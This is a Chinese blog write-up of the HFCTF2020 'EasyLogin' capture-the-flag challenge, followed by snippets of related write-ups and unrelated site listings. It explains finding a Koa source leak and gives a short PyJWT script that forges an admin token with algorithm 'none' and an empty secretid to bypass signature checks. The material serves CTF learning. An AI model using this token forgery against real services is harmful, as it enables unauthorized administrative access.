[HFCTF2020]EasyLogin 1

于 2024-09-30 10:03:20 发布
阅读量319 收藏 1
点赞数 13
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zarbb/article/details/142650189
版权

打开题目是一个登录框

查看页面源代码,发现app.js中显示,访问/api/flag,如果成功,则把flag的值以username的形式返回出来

访问后显示权限不够被拒绝

app.js中还有一个提示

发现koa-static是在构建Web应用时,提供静态资源(如HTML、CSS和JavaScript文件)是必不可少的一部分。 Koa-static正是为此目的而设计的,它是一个简洁且强大的Koa框架静态文件服务中间件,使得处理静态文件变得轻而易举。

koa的框架结构

controllers 项目控制器目录接受请求处理逻辑

DataBase 保存数据库封装的CRUD操作方法

models文件夹 对应的数据库表结构

config文件夹 项目路由文件夹

app.js 入口文件

可以看到controllers 是项目控制器目录接受请求处理逻辑的,访问一下controllers/api.js

可以看到无法创建admin账户,创建会报错

但是下面一段又显示不是admin账户无法访问flag

所以我们只能伪造admin账户,抓包和源码中都出现了jwt

Jwt的格式为前两段是base64,第三部分加密方式为第一部分声明的加密算法结合密匙进行加密,解密地址:JSON Web Tokens - jwt.io

需要一个脚本,去解密第三部分

import jwt #需要下载,pip3 install PyJWT

token = jwt.encode(

{

 "secretid": [], #让"secretid"为空,他的加密算法就为空,所以那个加密就废了,也算是绕过jwt的一种方式

 "username": "admin", #伪造对象

 "password": "123",

 "iat": 1726371956 #对应自己解码出来的iat

},

algorithm = "none", key="")

print(token)

利用脚本生成的jwt

然后改包发送,箭头指的地方有用需要保存

然后使用随便注册的账号登录获取下flag,把原包中的改成上一步的就可以获得flag了

zarbb
关注
[HFCTF2020]EasyLogin -wp
freerats的博客
07-29 2318
打开网页出现如上登入框,可以发现login和register等并没有php等后缀,初步判断是js框架,f12可以看到app.js 访问一下,提示是基于Node.js的koa框架,但是这个页面的代码并不是逻辑代码,用处不大。 在注释里提示静态文件处理出现问题,那么可能会出现任意文件读取漏洞 这里需要对koa框架的目录有一定的了解 其中controllers目录是项目控制器存放目录:接受请求,处理逻辑 访问controllers/api.js发现处理逻辑 const crypto = require('.
[HFCTF2020]EasyLogin
Sk1y的博客
09-20 769
知识点:nodejs,jwt 文章目录解题过程参考链接 解题过程 打开题目是个登录窗口,需要注册账号,然后登录,登录之后,有个获取flag的按钮,但是不能够获取flag,因为permission denied。 可以发现提示/static/js/app.js /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val();
[HFCTF2020]EasyLogin JWT认证
qq_54929891的博客
03-31 2761
这里记录一下我写题和学习的过程,具体对JWT还是不太了解的,希望大佬们指点一二 注册账号密码后在登陆的地方抓了个包 发现一个authorization授权,cookie里面有两个参数,感觉这个题应该考的是认证方面的,要用管理员的账户登陆进去才能获得flag,在flag界面只有一个js文件,打开看看 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username =
[HFCTF2020]EasyLogin(nodejs入门)
qq_44657899的博客
10-13 1992
在做这道题之前,完全不会nodejs。于是这道题也看不懂,于是打算学习学习nodejs。 文章目录app.js代码学习第一部分第二部分第三部分第四部分controllers/api.js部分学习 app.js代码学习 首先是/static/js/app.js的代码。 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username = $("#username").val();
BUUCTF---[HFCTF2020]EasyLogin保姆级详解。
m0_62107966的博客
09-11 1429
zhehco--BUUCTF---[HFCTF2020]EasyLogin保姆级详解。按照刚刚要修改的三个值修改,由于要修改alg为none,在网页上无法直接获取新的jwt,所以用python脚本生成,在此之前先用pip安装好生成jwt的库:PyJWT库。值得注意的是这里的iat,是要用你自己在burpsuite里拿到的jwt里的iat值。确定username为admin,且jwt为新生成的jwt后,放包,回到浏览器,访问。重点看看这两个函数,一个是生成jwt的,另一个是返回flag的。
[HFCTF2020]JustEscape
shinygod的博客
04-12 579
知识点:vm2沙盒逃逸 提示了一个run.php文件,没法利用,eval里的就不是一个变量。 <?php if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) { $code = $_GET['code']; echo eval(code); } else { highlight_file(__FILE__); } ?> 凑得处可以计算。 Error().stack测下
[HFCTF2020]EasyLogin --不会编程崽
不会编程的崽的博客
02-22 579
koa&jwt伪造
[HFCTF2020]EasyLogin(node.js的koa框架、jwt攻击方法)
qq_44111753的博客
02-11 429
1、node.js koa的主要框架目录 创建一个rest-hello的工程,结构; 2、jwt攻击方法 深入了解Json Web Token之概念篇 深入了解Json Web Token之实战篇 总的来说,jwt由三部分组成:Header.Payload.Signature。攻击的办法之一可以把header中alg字段更改为’none’,且Payload的secretid为空,即没有Signature 因为sid为空时,jwt将采用none algorithm解密,即对应了将alg='none’的加密
虎符2020CTF web easylogin.pdf
04-20
从提供的文件内容来看,这篇文档主要讨论了虎符2020CTF (Capture The Flag) 比赛中Web类题目“easylogin”的解题过程。CTF比赛是一种信息安全竞赛,参赛者需要通过解决各种信息安全挑战来获得相应的flag,即密码或...
2022HFCTF-线上赛官方Writeup1
08-04
在HFCTF 2022线上赛中,参赛者面临了一系列挑战,涵盖了网络安全的多个领域,包括Web安全、加密、逆向工程等。这里我们将深入探讨其中涉及到的一些关键技术点。 首先,描述中提到了“RSA 公钥解密”,这涉及到非...
[HFCTF2020]BabyUpload
qq_40327508的博客
08-06 1112
[HFCTF2020]BabyUpload 题目直接给了源代码 <?php error_reporting(0); session_save_path("/var/babyctf/"); session_start(); require_once "/flag"; highlight_file(__FILE__); if($_SESSION['username'] ==='admin') { $filename='/var/babyctf/success.txt'; if(file_e
---已搬运----BUUCTF:[HFCTF2020]BabyUpload sess_ file_exist()可 检测 目录和文件 。 sha256加密, PHP代码审计
Zero_Adam的博客
04-08 662
目录:一、自己做:1. 本地先试一试1. direction = upload & attr != private2. direction == upload & attr ==private3.direction=download & attr = (private)已经存在的 & filename =必须是完整文件名4.direction=download & attr = (not-private)已经存在的 & filename =必须是完整文件名2.
非标自动化设备【B81】.zip
09-29
非标自动化设备【B81】.zip
线段树的概念及C语言实现.docx
09-29
线段树的概念及C语言实现.docx
【语音处理】基于matlab GUI声音信号频谱分析和时域分析【含Matlab源码 8053期】.mp4
09-29
Matlab武动乾坤上传的视频均有对应的完整代码,皆可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描视频QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
美容院管理系统 基于Ssm和Mysql的美容院管理系统代码(程序,中文注释)
最新发布
09-29
考研助手-考研助手-考研助手-考研助手-考研助手-考研助手-考研助手-考研助手-考研助手-考研助手-考研助手-考研助手 1、资源说明:考研助手源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:Ssm ④ 架构:B/S、MVC ⑤ 开发环境:IDEA、JDK、Maven、Mysql ⑥ 数据库:mysql ⑦ 服
2024中国跨境电商海外营销观察报告-霞光智库
09-29
2024中国跨境电商海外营销观察报告-霞光智库.
基于Ssm和Vue的在线考试系统源码 在线考试系统代码(程序,中文注释)
09-29
在线考试系统-在线考试系统-在线考试系统-在线考试系统-在线考试系统-在线考试系统-在线考试系统-在线考试系统-在线考试系统-在线考试系统-在线考试系统-在线考试系统 1、资源说明:在线考试系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:Ssm ④ 架构:B/S、MVC ⑤ 开发环境:IDEA、JDK、M
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值